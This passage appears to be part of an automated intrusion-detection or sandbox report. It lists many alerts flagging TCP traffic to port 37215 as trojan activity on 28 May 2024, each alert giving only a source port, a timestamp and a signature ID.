                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.786510
                  SID:2835222
                  Source Port:44290
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.587129
                  SID:2829579
                  Source Port:44694
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906967
                  SID:2829579
                  Source Port:38844
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719872
                  SID:2829579
                  Source Port:56940
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.930336
                  SID:2829579
                  Source Port:60544
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536245
                  SID:2835222
                  Source Port:55174
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844926
                  SID:2829579
                  Source Port:59556
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.563574
                  SID:2829579
                  Source Port:42390
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.659004
                  SID:2835222
                  Source Port:60626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887217
                  SID:2829579
                  Source Port:60810
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887187
                  SID:2829579
                  Source Port:50196
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.718854
                  SID:2835222
                  Source Port:57830
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627823
                  SID:2835222
                  Source Port:40842
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.931680
                  SID:2835222
                  Source Port:54548
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661312
                  SID:2835222
                  Source Port:41966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.584770
                  SID:2829579
                  Source Port:46910
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789784
                  SID:2835222
                  Source Port:36964
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695103
                  SID:2835222
                  Source Port:36494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.790495
                  SID:2835222
                  Source Port:46938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.584425
                  SID:2829579
                  Source Port:52198
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768634
                  SID:2835222
                  Source Port:58012
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.770955
                  SID:2829579
                  Source Port:38614
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791480
                  SID:2835222
                  Source Port:60342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.656509
                  SID:2835222
                  Source Port:54570
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659267
                  SID:2829579
                  Source Port:45904
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.800768
                  SID:2829579
                  Source Port:51022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659255
                  SID:2835222
                  Source Port:42966
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.454798
                  SID:2829579
                  Source Port:34368
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.874948
                  SID:2829579
                  Source Port:35680
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546744
                  SID:2829579
                  Source Port:50618
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.661905
                  SID:2829579
                  Source Port:43542
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696076
                  SID:2835222
                  Source Port:47604
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.547492
                  SID:2835222
                  Source Port:51722
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661172
                  SID:2829579
                  Source Port:59176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.546553
                  SID:2835222
                  Source Port:52658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.745949
                  SID:2829579
                  Source Port:34154
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.578678
                  SID:2829579
                  Source Port:39706
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.876888
                  SID:2829579
                  Source Port:48296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586888
                  SID:2835222
                  Source Port:57126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886658
                  SID:2835222
                  Source Port:38474
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528315
                  SID:2835222
                  Source Port:48424
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.775870
                  SID:2835222
                  Source Port:41064
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.843882
                  SID:2835222
                  Source Port:40856
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.536613
                  SID:2835222
                  Source Port:60888
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.542566
                  SID:2829579
                  Source Port:49230
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649662
                  SID:2829579
                  Source Port:56180
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.872235
                  SID:2829579
                  Source Port:51054
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766674
                  SID:2829579
                  Source Port:55760
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.886199
                  SID:2829579
                  Source Port:43050
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.604557
                  SID:2835222
                  Source Port:56800
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.649738
                  SID:2829579
                  Source Port:50848
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.768766
                  SID:2829579
                  Source Port:49190
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.845956
                  SID:2829579
                  Source Port:49508
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.796800
                  SID:2835222
                  Source Port:41460
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585430
                  SID:2835222
                  Source Port:57398
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312387
                  SID:2835222
                  Source Port:41568
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912212
                  SID:2829579
                  Source Port:49208
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.801942
                  SID:2835222
                  Source Port:58932
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.765351
                  SID:2835222
                  Source Port:54626
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.576099
                  SID:2835222
                  Source Port:37178
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319924
                  SID:2835222
                  Source Port:33512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719146
                  SID:2829579
                  Source Port:38410
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651780
                  SID:2829579
                  Source Port:53184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798086
                  SID:2829579
                  Source Port:58332
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.660986
                  SID:2829579
                  Source Port:49296
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.496126
                  SID:2835222
                  Source Port:42262
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.605947
                  SID:2829579
                  Source Port:39914
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.713741
                  SID:2835222
                  Source Port:33258
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.906985
                  SID:2835222
                  Source Port:59372
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.629089
                  SID:2835222
                  Source Port:56620
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.591043
                  SID:2835222
                  Source Port:49176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719478
                  SID:2829579
                  Source Port:54182
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.923868
                  SID:2835222
                  Source Port:49120
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.799472
                  SID:2835222
                  Source Port:56558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.884902
                  SID:2829579
                  Source Port:56948
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586920
                  SID:2835222
                  Source Port:36658
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887888
                  SID:2835222
                  Source Port:46330
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661760
                  SID:2829579
                  Source Port:37554
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.869836
                  SID:2829579
                  Source Port:52650
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.665527
                  SID:2835222
                  Source Port:44840
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.660017
                  SID:2829579
                  Source Port:53394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720250
                  SID:2835222
                  Source Port:59812
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766061
                  SID:2829579
                  Source Port:51022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528252
                  SID:2829579
                  Source Port:40396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.535997
                  SID:2835222
                  Source Port:47616
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.789490
                  SID:2829579
                  Source Port:56400
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.585195
                  SID:2829579
                  Source Port:51612
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.780999
                  SID:2829579
                  Source Port:48306
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870951
                  SID:2829579
                  Source Port:56516
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.488737
                  SID:2835222
                  Source Port:58490
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489243
                  SID:2829579
                  Source Port:50312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.880078
                  SID:2829579
                  Source Port:45188
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.791325
                  SID:2835222
                  Source Port:38176
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912845
                  SID:2835222
                  Source Port:44882
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651410
                  SID:2829579
                  Source Port:60438
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887951
                  SID:2829579
                  Source Port:37106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586337
                  SID:2835222
                  Source Port:37324
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298162
                  SID:2829579
                  Source Port:37504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696649
                  SID:2835222
                  Source Port:48652
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.704295
                  SID:2829579
                  Source Port:51232
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.510265
                  SID:2835222
                  Source Port:48936
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.657746
                  SID:2835222
                  Source Port:33630
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587905
                  SID:2829579
                  Source Port:41496
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908973
                  SID:2829579
                  Source Port:47184
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298162
                  SID:2835222
                  Source Port:37504
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577250
                  SID:2829579
                  Source Port:38218
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.742662
                  SID:2835222
                  Source Port:37546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.766095
                  SID:2835222
                  Source Port:51228
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.911136
                  SID:2835222
                  Source Port:51510
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887331
                  SID:2835222
                  Source Port:59082
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.577429
                  SID:2835222
                  Source Port:59780
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.297659
                  SID:2829579
                  Source Port:48996
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908186
                  SID:2829579
                  Source Port:55022
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312234
                  SID:2829579
                  Source Port:55308
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.312367
                  SID:2835222
                  Source Port:51900
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.798172
                  SID:2835222
                  Source Port:53146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:25.887951
                  SID:2835222
                  Source Port:37106
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.907891
                  SID:2829579
                  Source Port:55378
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.294722
                  SID:2835222
                  Source Port:52488
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:06.491191
                  SID:2829579
                  Source Port:46724
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.702556
                  SID:2835222
                  Source Port:52000
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.548215
                  SID:2835222
                  Source Port:54100
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.870835
                  SID:2829579
                  Source Port:52394
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769308
                  SID:2829579
                  Source Port:59546
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.298633
                  SID:2835222
                  Source Port:47146
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.942676
                  SID:2835222
                  Source Port:52036
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.528252
                  SID:2835222
                  Source Port:40396
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.788017
                  SID:2835222
                  Source Port:44364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.586021
                  SID:2829579
                  Source Port:58164
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.818010
                  SID:2829579
                  Source Port:51638
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.925848
                  SID:2829579
                  Source Port:49708
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.912852
                  SID:2835222
                  Source Port:39512
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.483047
                  SID:2829579
                  Source Port:56530
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.719087
                  SID:2829579
                  Source Port:43924
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.694948
                  SID:2835222
                  Source Port:35580
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.695678
                  SID:2829579
                  Source Port:46998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.844808
                  SID:2835222
                  Source Port:60246
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.908030
                  SID:2829579
                  Source Port:53216
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:27.921780
                  SID:2835222
                  Source Port:58108
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.767793
                  SID:2835222
                  Source Port:49072
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.650326
                  SID:2835222
                  Source Port:48412
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846719
                  SID:2829579
                  Source Port:43446
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:17.696381
                  SID:2835222
                  Source Port:57024
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.319878
                  SID:2835222
                  Source Port:43426
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.769341
                  SID:2829579
                  Source Port:34086
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.847662
                  SID:2829579
                  Source Port:44340
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.598812
                  SID:2835222
                  Source Port:40598
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276499
                  SID:2829579
                  Source Port:52254
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.920075
                  SID:2829579
                  Source Port:55364
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:22.806139
                  SID:2829579
                  Source Port:57952
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.610323
                  SID:2835222
                  Source Port:35864
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530466
                  SID:2829579
                  Source Port:34432
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.664595
                  SID:2835222
                  Source Port:47558
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.607430
                  SID:2835222
                  Source Port:51632
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.551828
                  SID:2829579
                  Source Port:34808
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.529101
                  SID:2835222
                  Source Port:37792
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.857782
                  SID:2829579
                  Source Port:40454
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.659933
                  SID:2835222
                  Source Port:39822
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.761046
                  SID:2829579
                  Source Port:42824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545395
                  SID:2829579
                  Source Port:54494
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:10.549185
                  SID:2835222
                  Source Port:37596
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:26.910522
                  SID:2835222
                  Source Port:35972
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.489867
                  SID:2835222
                  Source Port:59774
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.846827
                  SID:2835222
                  Source Port:53084
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.276577
                  SID:2835222
                  Source Port:37532
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:19.781078
                  SID:2835222
                  Source Port:41500
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:18.720241
                  SID:2829579
                  Source Port:55502
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.530984
                  SID:2829579
                  Source Port:36168
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.594434
                  SID:2835222
                  Source Port:42938
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:04.295832
                  SID:2829579
                  Source Port:57342
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:07.490308
                  SID:2829579
                  Source Port:32874
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.545901
                  SID:2835222
                  Source Port:36584
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:15.651258
                  SID:2829579
                  Source Port:54312
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:21.795253
                  SID:2829579
                  Source Port:53046
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.316596
                  SID:2829579
                  Source Port:52998
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:16.661739
                  SID:2829579
                  Source Port:38824
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:11.601637
                  SID:2829579
                  Source Port:54344
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:13.587950
                  SID:2829579
                  Source Port:40922
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:05.283784
                  SID:2829579
                  Source Port:52126
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:14.627915
                  SID:2829579
                  Source Port:39562
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:20.729727
                  SID:2835222
                  Source Port:49118
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:24.849072
                  SID:2835222
                  Source Port:42090
                  Destination Port:37215
                  Protocol:TCP
                  Classtype:A Network Trojan was detected
                  Timestamp:05/28/24-08:59:08.517612
                  SID:2835222
